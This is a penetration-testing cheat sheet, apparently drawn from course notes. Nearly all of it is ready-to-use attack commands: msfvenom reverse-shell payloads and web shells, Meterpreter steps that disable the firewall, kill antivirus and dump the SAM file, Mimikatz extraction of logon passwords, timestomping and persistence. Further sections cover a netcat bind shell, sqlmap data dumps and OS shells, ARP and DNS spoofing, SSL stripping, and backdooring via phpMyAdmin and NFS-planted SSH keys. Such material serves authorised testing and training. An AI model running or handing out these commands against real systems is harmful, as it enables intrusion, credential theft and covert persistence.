Metasploit Cheat Sheet

List payloads

msfvenom -l

I. Binaries

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

II. Web Payloads

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

III. Scripting Payloads

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw >
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw >
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw >

For all shellcode, see 'msfvenom --help-formats' for the list of valid output formats. Msfvenom will output code in the chosen language that can be cut and pasted into your exploits.

IV. Shellcode

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f 

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f 

VI. Handlers

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

use exploit/multi/handler
set ExitOnSession false
exploit -j -z

Meterpreter Useful Commands:

upload file c:\\windows

download c:\\windows\\repair\\sam /tmp

execute -f c:\\windows\\temp\\exploit.exe

execute -f cmd -c

portfwd add -l 3389 -p 3389 -r target

portfwd delete -l 3389 -p 3389 -r target

Additional useful commands are as follows:

  • msfconsole -r unicorn.rb

  • meterpreter shell

  • getsid

  • getuid

  • migrate

  • getsystem

  • run killav

  • run checkvm

  • exploit Windows7 Service Pack 1 msp

  • use incognito

  • run countermeasure

  • run countermeasure -d -k

  • shell

    • netsh firewall set opmode disable //disable firewall

  • run vnc

  • load mimikatz

  • ls

  • upload /home/user/mimikatz.exe C:\\

  • timestomp mimikatz.exe -f "C:\\Windows\\System32\\cmd.exe"

  • shell

    • mimikatz.exe

    • privilege::debug

    • inject::process lsass.exe sekurlsa.dll

    • getLogonPasswords

    • sekurlsa::logonPasswords full

  • run persistence -A -L C:\\ -X -i 10 -p 443 -r

  • attrib +h c:\autoexec.bat //make it hidden

  • Priv Esc Exploit CVE-2014-4113 (ms14_058_track_popup_menu)

Burp Suite and sqlmap

1. Burpsuite -> Intruder

2. sqlmap
python sqlmap.py -u ""

# Discover databases
python sqlmap.py -u "" --dbs

# Find tables in a particular database
python sqlmap.py -u "" --tables -D database_name

# Get columns of the table
python sqlmap.py -u "" --columns -D database_name -T users

# Get data from the columns
python sqlmap.py -u "" --dump -D database_name -T users

# Upload os-shell
python sqlmap.py -u "" --os-shell

# Upload a PHP shell
-> b374kshell.php

Netcat Shell and Persistence

# Notes on Cybrary “Advanced Penetration Test”
Opening a command shell listener:
root@kali:~# nc -lvp 1234 -e /bin/bash

Transferring files:
Redirect output to a file:
root@kali:~# nc -lvp 1234 > netcatfile

Send a file from another terminal:
root@kali:~# nc 1234 < mydirectory/myfile

Automating Tasks with cron jobs
Add your task to one of the scheduled directories
*For more flexibility add a line to /etc/crontab

Information Gathering

# Source: Cybrary “Advanced Penetration Test”

*Find as much information as possible about the target.
*What domains do they own? What job ads are they posting? What is their email structure? What technologies are they using on publicly facing systems?

(1) Google Dorks
Database of helpful Google Dorks:
Example: xamppdirpasswd.txt filetype:txt finds xampp passwords

(2) Shodan (Python API)
Search engine that uses banner grabbing

(3) Whois
Domain registration records
root@kali:~# whois

(4) DNS Recon
root@kali:~# host
root@kali:~# host -t ns
root@kali:~# host -t mx

*DNS Zone Transfer
root@kali:~# host -t ns
root@kali:~# host -l

DNS Bruteforce
root@kali:~# fierce -dns

(5) Netcraft

(6) The Harvester
The Harvester automatically searches for emails etc. online
root@kali:~# theharvester -d -l 500 -b all

(7) Maltego
Graphical information gathering and correlation tool
root@kali:~# maltego

(8) Recon-ng
Reconnaissance framework
recon-ng > use recon/hosts/enum/http/web/xssed
[recon-ng][default][xssed] > show options
recon-ng [xssed] > set DOMAIN
recon-ng [xssed] > run

(9) Port Scanning
root@kali:~# nmap -sS -oA synscan
root@kali:~# nmap -sU -oA udpscan

Metasploit Port Scanners
search portscan (shows portscan modules)
scanner/portscan/tcp (runs a TCP connect scan)
Use auxiliary modules like exploits (use, set, exploit, etc..)

Vulnerability Identification

Source: Georgia Weidman, “Advanced Penetration Test” Cybrary
Query systems for potential vulnerabilities

(1) Nessus
Vulnerability database + scanner 

(2) Nmap Scripting Engine
Vulnerability scripts
Listed in /usr/share/nmap/scripts in Kali

nmap -sC
nmap --script-help=smb-check-vulns
nmap --script=nfs-ls
nmap --script=smb-os-discovery

(3) Metasploit Scanners
auxiliary/scanner/ftp/anonymous

Web Application Scanning
(1) Dirbuster
Graphical tool that is used for bruteforcing directories and pages.

(2) Nikto
Vulnerability database of known website issues
nikto -host

Manual Analysis
*Default passwords – Webdav
*Misconfigured pages – open phpMyAdmin
*Port 3232 on the Windows system – sensitive webserver with directory traversal

Capturing Traffic

Source: Georgia Weidman on “Advanced Penetration Test”

(1) ARP Spoofing
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t
arpspoof -i eth0 -t

(2) Domain Name Service (DNS)
DNS Cache Poisoning
*Restart arpspoofing between gateway and target
dnsspoof -i eth0 -f hosts.txt

(3) Secure Socket Layer (SSL)
Crypto between browser and webserver
Can’t see credentials in plaintext

SSL Man in the Middle
SSL Stripping

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Spoof the default gateway with Arpspoof
sslstrip -l 8080

Exploitation: Basics

Source: Georgia Weidman on “Advanced Penetration Test”

(1) Webdav Default Credentials
Default -> wampp:xampp

a. cadaver
b. Use Msfvenom to create a PHP shell and upload
c. Use msfconsole to exploit

(2) Open phpMyAdmin
a. Create a php shell on the Apache server using a SQL query
SELECT "" into outfile "C:\\xampp\\htdocs\\shell.php"

b. Add a meterpreter PHP file
get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php

(3) Downloading Sensitive Files
Zervit 0.4 directory traversal
nc 3232 GET /../../../../../boot.ini HTTP/1.1

(4) Exploiting a Buffer Overflow
Buffer overflow in SLMail

(5) Exploiting a Web Application
Unsanitized parameter in graph_formula.php -> PHP code execution

(6) Piggybacking on a Compromised Service
VsFTP -> backdoored
Username ending in a :) spawned a backdoor on port 6200

(7) Exploiting Open NFS Shares
NFS on port 2049
showmount -e
mkdir /tmp/r00t/
mount -t nfs -o nolock /tmp/r00t/
cat ~/.ssh/ >> /tmp/r00t/.ssh/authorized_keys
umount /tmp/r00t/